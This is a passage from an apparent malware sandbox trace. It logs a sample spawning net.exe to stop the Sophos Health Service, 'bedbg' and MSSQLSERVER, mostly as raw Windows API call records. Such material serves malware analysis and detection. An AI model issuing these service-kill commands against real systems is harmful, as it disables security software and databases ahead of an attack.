lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xc1 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x16 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x33 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x234 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x13 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x14 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x14 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x15 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x439638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x15 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x439638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x16 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x439638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="䵀C⡋瓢+阸C+") returned 0x11 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x434d40) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+䵀C+") returned 0x14 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x43b638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+똸C+") returned 0x12 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x43b638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+똸C+") returned 0xf [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x43b638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+똸C+") returned 0x17 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x43b638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+똸C+") returned 0x18 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x43b638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+똸C+") returned 0x2a [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0043.397] LocalFree (hMem=0x43b638) returned 0x0 [0043.397] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="똸C⡋瓢+똸C+") returned 0x15 [0043.397] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0043.397] GetFileType (hFile=0x26c) returned 0x3 [0043.397] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x2bf304 | out: lpMode=0x2bf304) returned 0 [0043.398] GetConsoleOutputCP () returned 0x1b5 [0043.398] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0043.398] malloc (_Size=0x16) returned 0x702728 [0043.398] GetConsoleOutputCP () returned 0x1b5 [0043.398] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x702728, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0043.398] WriteFile (in: hFile=0x26c, lpBuffer=0x702728*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2bf308, lpOverlapped=0x0 | out: lpBuffer=0x702728*, lpNumberOfBytesWritten=0x2bf308*=0x15, lpOverlapped=0x0) returned 1 [0043.398] free (_Block=0x702728) [0043.398] LocalFree (hMem=0x43b638) returned 0x0 [0043.398] NetApiBufferFree (Buffer=0x431c98) returned 0x0 [0043.399] NetApiBufferFree (Buffer=0x431cb0) returned 0x0 [0043.399] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Health ServiceΓÇ¥ /y" [0043.399] exit (_Code=1) Process: id = "71" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47487000" os_pid = "0x834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop bedbg /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 139 os_tid = 0x6f8 Process: id = "72" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x476ad000" os_pid = "0x4f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "71" os_parent_pid = "0x834" cmd_line = "C:\\Windows\\system32\\net1 stop bedbg /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 140 os_tid = 0x78c [0043.732] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fd30 | out: lpSystemTimeAsFileTime=0x35fd30*(dwLowDateTime=0xe445ce20, dwHighDateTime=0x1d57a86)) [0043.732] GetCurrentProcessId () returned 0x4f0 [0043.732] GetCurrentThreadId () returned 0x78c [0043.732] GetTickCount () returned 0x1145e95 [0043.732] QueryPerformanceCounter (in: lpPerformanceCount=0x35fd28 | out: lpPerformanceCount=0x35fd28*=16401662169) returned 1 [0043.732] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0043.732] __set_app_type (_Type=0x1) [0043.732] __p__fmode () returned 0x74eb31f4 [0043.732] __p__commode () returned 0x74eb31fc [0043.732] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8ffe6) returned 0x0 [0043.733] __getmainargs (in: _Argc=0x99064, _Argv=0x9906c, _Env=0x99068, _DoWildCard=0, _StartInfo=0x99024 | out: _Argc=0x99064, _Argv=0x9906c, _Env=0x99068) returned 0 [0043.733] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.733] GetConsoleOutputCP () returned 0x1b5 [0043.733] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x99080 | out: lpCPInfo=0x99080) returned 1 [0043.733] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.736] sprintf_s (in: _DstBuf=0x35fce8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0043.736] setlocale (category=0, locale=".437") returned="English_United States.437" [0043.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0043.738] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0043.738] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop bedbg /y" [0043.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fab4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0043.738] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5e) returned 0x423bf0 [0043.738] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0043.739] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fcb8 | out: Buffer=0x35fcb8*=0x421c50) returned 0x0 [0043.739] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fcb8 | out: Buffer=0x35fcb8*=0x421c68) returned 0x0 [0043.739] _fileno (_File=0x74eb2900) returned -2 [0043.739] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0043.739] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0043.739] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0043.739] _wcsicmp (_String1="config", _String2="stop") returned -16 [0043.739] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0043.739] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0043.739] _wcsicmp (_String1="file", _String2="stop") returned -13 [0043.739] _wcsicmp (_String1="files", _String2="stop") returned -13 [0043.739] _wcsicmp (_String1="group", _String2="stop") returned -12 [0043.739] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0043.739] _wcsicmp (_String1="help", _String2="stop") returned -11 [0043.739] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0043.739] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0043.739] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0043.739] _wcsicmp (_String1="session", _String2="stop") returned -15 [0043.739] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0043.739] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0043.739] _wcsicmp (_String1="share", _String2="stop") returned -12 [0043.739] _wcsicmp (_String1="start", _String2="stop") returned -14 [0043.739] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0043.739] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0043.739] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0043.739] _wcsicmp (_String1="accounts", _String2="bedbg") returned -1 [0043.739] _wcsicmp (_String1="computer", _String2="bedbg") returned 1 [0043.739] _wcsicmp (_String1="config", _String2="bedbg") returned 1 [0043.739] _wcsicmp (_String1="continue", _String2="bedbg") returned 1 [0043.739] _wcsicmp (_String1="cont", _String2="bedbg") returned 1 [0043.739] _wcsicmp (_String1="file", _String2="bedbg") returned 4 [0043.739] _wcsicmp (_String1="files", _String2="bedbg") returned 4 [0043.740] _wcsicmp (_String1="group", _String2="bedbg") returned 5 [0043.740] _wcsicmp (_String1="groups", _String2="bedbg") returned 5 [0043.740] _wcsicmp (_String1="help", _String2="bedbg") returned 6 [0043.740] _wcsicmp (_String1="helpmsg", _String2="bedbg") returned 6 [0043.740] _wcsicmp (_String1="localgroup", _String2="bedbg") returned 10 [0043.740] _wcsicmp (_String1="pause", _String2="bedbg") returned 14 [0043.740] _wcsicmp (_String1="session", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="sessions", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="sess", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="share", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="start", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="stats", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="statistics", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="stop", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="time", _String2="bedbg") returned 18 [0043.740] _wcsicmp (_String1="user", _String2="bedbg") returned 19 [0043.740] _wcsicmp (_String1="users", _String2="bedbg") returned 19 [0043.740] _wcsicmp (_String1="msg", _String2="bedbg") returned 11 [0043.740] _wcsicmp (_String1="messenger", _String2="bedbg") returned 11 [0043.740] _wcsicmp (_String1="receiver", _String2="bedbg") returned 16 [0043.740] _wcsicmp (_String1="rcv", _String2="bedbg") returned 16 [0043.740] _wcsicmp (_String1="netpopup", _String2="bedbg") returned 12 [0043.740] _wcsicmp (_String1="redirector", _String2="bedbg") returned 16 [0043.740] _wcsicmp (_String1="redir", _String2="bedbg") returned 16 [0043.740] _wcsicmp (_String1="rdr", _String2="bedbg") returned 16 [0043.740] _wcsicmp (_String1="workstation", _String2="bedbg") returned 21 [0043.740] _wcsicmp (_String1="work", _String2="bedbg") returned 21 [0043.740] _wcsicmp (_String1="wksta", _String2="bedbg") returned 21 [0043.740] _wcsicmp (_String1="prdr", _String2="bedbg") returned 14 [0043.740] _wcsicmp (_String1="devrdr", _String2="bedbg") returned 2 [0043.740] _wcsicmp (_String1="lanmanworkstation", _String2="bedbg") returned 10 [0043.740] _wcsicmp (_String1="server", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="svr", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="srv", _String2="bedbg") returned 17 [0043.740] _wcsicmp (_String1="lanmanserver", _String2="bedbg") returned 10 [0043.740] _wcsicmp (_String1="alerter", _String2="bedbg") returned -1 [0043.740] _wcsicmp (_String1="netlogon", _String2="bedbg") returned 12 [0043.741] _wcsupr (in: _String="bedbg" | out: _String="BEDBG") returned="BEDBG" [0043.741] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4254a0 [0043.744] GetServiceKeyNameW (in: hSCManager=0x4254a0, lpDisplayName="BEDBG", lpServiceName=0x9aaf0, lpcchBuffer=0x35fc54 | out: lpServiceName="", lpcchBuffer=0x35fc54) returned 0 [0043.744] _wcsicmp (_String1="msg", _String2="BEDBG") returned 11 [0043.744] _wcsicmp (_String1="messenger", _String2="BEDBG") returned 11 [0043.744] _wcsicmp (_String1="receiver", _String2="BEDBG") returned 16 [0043.744] _wcsicmp (_String1="rcv", _String2="BEDBG") returned 16 [0043.744] _wcsicmp (_String1="redirector", _String2="BEDBG") returned 16 [0043.744] _wcsicmp (_String1="redir", _String2="BEDBG") returned 16 [0043.744] _wcsicmp (_String1="rdr", _String2="BEDBG") returned 16 [0043.744] _wcsicmp (_String1="workstation", _String2="BEDBG") returned 21 [0043.744] _wcsicmp (_String1="work", _String2="BEDBG") returned 21 [0043.744] _wcsicmp (_String1="wksta", _String2="BEDBG") returned 21 [0043.744] _wcsicmp (_String1="prdr", _String2="BEDBG") returned 14 [0043.744] _wcsicmp (_String1="devrdr", _String2="BEDBG") returned 2 [0043.744] _wcsicmp (_String1="lanmanworkstation", _String2="BEDBG") returned 10 [0043.744] _wcsicmp (_String1="server", _String2="BEDBG") returned 17 [0043.744] _wcsicmp (_String1="svr", _String2="BEDBG") returned 17 [0043.744] _wcsicmp (_String1="srv", _String2="BEDBG") returned 17 [0043.745] _wcsicmp (_String1="lanmanserver", _String2="BEDBG") returned 10 [0043.745] _wcsicmp (_String1="alerter", _String2="BEDBG") returned -1 [0043.745] _wcsicmp (_String1="netlogon", _String2="BEDBG") returned 12 [0043.745] NetServiceControl (in: servername=0x0, service="BEDBG", opcode=0x0, arg=0x0, bufptr=0x35fc50 | out: bufptr=0x35fc50) returned 0x889 [0043.745] wcscpy_s (in: _Destination=0x9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0043.746] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0043.746] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x9b338, nSize=0x800, Arguments=0x99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0043.747] GetFileType (hFile=0x26c) returned 0x3 [0043.747] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x423fd0 [0043.747] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x423fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0043.747] WriteFile (in: hFile=0x26c, lpBuffer=0x423fd0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fb90, lpOverlapped=0x0 | out: lpBuffer=0x423fd0*, lpNumberOfBytesWritten=0x35fb90*=0x1e, lpOverlapped=0x0) returned 1 [0043.747] LocalFree (hMem=0x423fd0) returned 0x0 [0043.747] GetFileType (hFile=0x26c) returned 0x3 [0043.747] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426278 [0043.747] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0043.747] WriteFile (in: hFile=0x26c, lpBuffer=0x426278*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fb90, lpOverlapped=0x0 | out: lpBuffer=0x426278*, lpNumberOfBytesWritten=0x35fb90*=0x2, lpOverlapped=0x0) returned 1 [0043.747] LocalFree (hMem=0x426278) returned 0x0 [0043.747] _ultow (in: _Dest=0x889, _Radix=3537856 | out: _Dest=0x889) returned="2185" [0043.748] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9b338, nSize=0x800, Arguments=0x99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0043.748] GetFileType (hFile=0x26c) returned 0x3 [0043.748] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x426278 [0043.748] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x426278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0043.748] WriteFile (in: hFile=0x26c, lpBuffer=0x426278*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fb9c, lpOverlapped=0x0 | out: lpBuffer=0x426278*, lpNumberOfBytesWritten=0x35fb9c*=0x34, lpOverlapped=0x0) returned 1 [0043.748] LocalFree (hMem=0x426278) returned 0x0 [0043.748] GetFileType (hFile=0x26c) returned 0x3 [0043.748] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426278 [0043.748] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0043.748] WriteFile (in: hFile=0x26c, lpBuffer=0x426278*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fb9c, lpOverlapped=0x0 | out: lpBuffer=0x426278*, lpNumberOfBytesWritten=0x35fb9c*=0x2, lpOverlapped=0x0) returned 1 [0043.748] LocalFree (hMem=0x426278) returned 0x0 [0043.748] NetApiBufferFree (Buffer=0x421c50) returned 0x0 [0043.748] NetApiBufferFree (Buffer=0x421c68) returned 0x0 [0043.748] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop bedbg /y" [0043.749] exit (_Code=2) Process: id = "73" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4738c000" os_pid = "0x35c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLSERVER /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 141 os_tid = 0x788 Process: id = "74" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x459ed000" os_pid = "0x41c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLSERVER /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 142 os_tid = 0x830 [0044.108] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11f970 | out: lpSystemTimeAsFileTime=0x11f970*(dwLowDateTime=0xe47eef20, dwHighDateTime=0x1d57a86)) [0044.108] GetCurrentProcessId () returned 0x41c [0044.108] GetCurrentThreadId () returned 0x830 [0044.108] GetTickCount () returned 0x114600b [0044.108] QueryPerformanceCounter (in: lpPerformanceCount=0x11f968 | out: lpPerformanceCount=0x11f968*=16439289322) returned 1 [0044.108] GetModuleHandleA (lpModuleName=0x0) returned 0xf00000 [0044.108] __set_app_type (_Type=0x1) [0044.108] __p__fmode () returned 0x74eb31f4 [0044.109] __p__commode () returned 0x74eb31fc [0044.109] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf0ffe6) returned 0x0 [0044.109] __getmainargs (in: _Argc=0xf19064, _Argv=0xf1906c, _Env=0xf19068, _DoWildCard=0, _StartInfo=0xf19024 | out: _Argc=0xf19064, _Argv=0xf1906c, _Env=0xf19068) returned 0 [0044.109] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.109] GetConsoleOutputCP () returned 0x1b5 [0044.109] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf19080 | out: lpCPInfo=0xf19080) returned 1 [0044.109] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.112] sprintf_s (in: _DstBuf=0x11f928, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0044.112] setlocale (category=0, locale=".437") returned="English_United States.437" [0044.114] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0044.114] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0044.114] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLSERVER /y" [0044.114] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11f6f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0044.114] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x6a) returned 0x623c10 [0044.115] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0044.115] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11f8f8 | out: Buffer=0x11f8f8*=0x621c70) returned 0x0 [0044.115] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11f8f8 | out: Buffer=0x11f8f8*=0x621c88) returned 0x0 [0044.115] _fileno (_File=0x74eb2900) returned -2 [0044.115] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0044.115] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0044.115] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0044.115] _wcsicmp (_String1="config", _String2="stop") returned -16 [0044.115] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0044.115] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0044.115] _wcsicmp (_String1="file", _String2="stop") returned -13 [0044.115] _wcsicmp (_String1="files", _String2="stop") returned -13 [0044.115] _wcsicmp (_String1="group", _String2="stop") returned -12 [0044.115] _wcsicmp (_String1="groups", 